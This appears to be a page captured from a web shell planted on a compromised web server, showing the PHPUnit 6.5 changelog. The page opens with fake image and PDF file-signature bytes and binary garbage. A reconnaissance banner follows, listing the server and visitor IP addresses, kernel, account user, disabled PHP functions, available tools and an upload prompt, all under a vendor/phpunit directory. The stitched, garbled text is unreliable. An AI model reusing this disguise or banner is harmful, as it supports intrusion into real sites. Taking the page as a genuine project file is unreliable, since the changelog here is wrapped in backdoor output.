ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.129 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/_api/vendor/phpunit/phpunit/ |
Upload File : |
# Changes in PHPUnit 6.5 All notable changes of the PHPUnit 6.5 release series are documented in this file using the [Keep a CHANGELOG](http://keepachangelog.com/) principles. ## [6.5.6] - 2018-02-01 ### Fixed * Fixed [#2236](https://github.com/sebastianbergmann/phpunit/issues/2236): Exceptions in `tearDown()` do not affect `getStatus()` * Fixed [#2950](https://github.com/sebastianbergmann/phpunit/issues/2950): Class extending `PHPUnit\Framework\TestSuite` does not extend `PHPUnit\FrameworkTestCase` * Fixed [#2972](https://github.com/sebastianbergmann/phpunit/issues/2972): PHPUnit crashes when test suite contains both `.phpt` files and unconventionally named tests ## [6.5.5] - 2017-12-17 ### Fixed * Fixed [#2922](https://github.com/sebastianbergmann/phpunit/issues/2922): Test class is not discovered when there is a test class with `@group` and provider throwing exception in it, tests are run with `--exclude-group` for that group, there is another class called later (after the class from above), and the name of that another class does not match its filename ## [6.5.4] - 2017-12-10 ### Changed * Require version 5.0.5 of `phpunit/phpunit-mock-objects` for [phpunit-mock-objects#394](https://github.com/sebastianbergmann/phpunit-mock-objects/issues/394) ## [6.5.3] - 2017-12-06 ### Fixed * Fixed an issue with PHPT tests when `forceCoversAnnotation="true"` is configured ## [6.5.2] - 2017-12-02 ### Changed * Require version 5.0.4 of `phpunit/phpunit-mock-objects` for [phpunit-mock-objects#388](https://github.com/sebastianbergmann/phpunit-mock-objects/issues/388) ## [6.5.1] - 2017-12-01 * Fixed [#2886](https://github.com/sebastianbergmann/phpunit/pull/2886): Forced environment variables do not affect `getenv()` ## [6.5.0] - 2017-12-01 ### Added * Implemented [#2286](https://github.com/sebastianbergmann/phpunit/issues/2286): Optional `$exit` parameter for `PHPUnit\TextUI\TestRunner::run()` * Implemented [#2496](https://github.com/sebastianbergmann/phpunit/issues/2496): Allow shallow copy of dependencies ### Fixed * Fixed [#2654](https://github.com/sebastianbergmann/phpunit/issues/2654): Problems with `assertJsonStringEqualsJsonString()` * Fixed [#2810](https://github.com/sebastianbergmann/phpunit/pull/2810): Code Coverage for PHPT tests does not work [6.5.6]: https://github.com/sebastianbergmann/phpunit/compare/6.5.5...6.5.6 [6.5.5]: https://github.com/sebastianbergmann/phpunit/compare/6.5.4...6.5.5 [6.5.4]: https://github.com/sebastianbergmann/phpunit/compare/6.5.3...6.5.4 [6.5.3]: https://github.com/sebastianbergmann/phpunit/compare/6.5.2...6.5.3 [6.5.2]: https://github.com/sebastianbergmann/phpunit/compare/6.5.1...6.5.2 [6.5.1]: https://github.com/sebastianbergmann/phpunit/compare/6.5.0...6.5.1 [6.5.0]: https://github.com/sebastianbergmann/phpunit/compare/6.4...6.5.0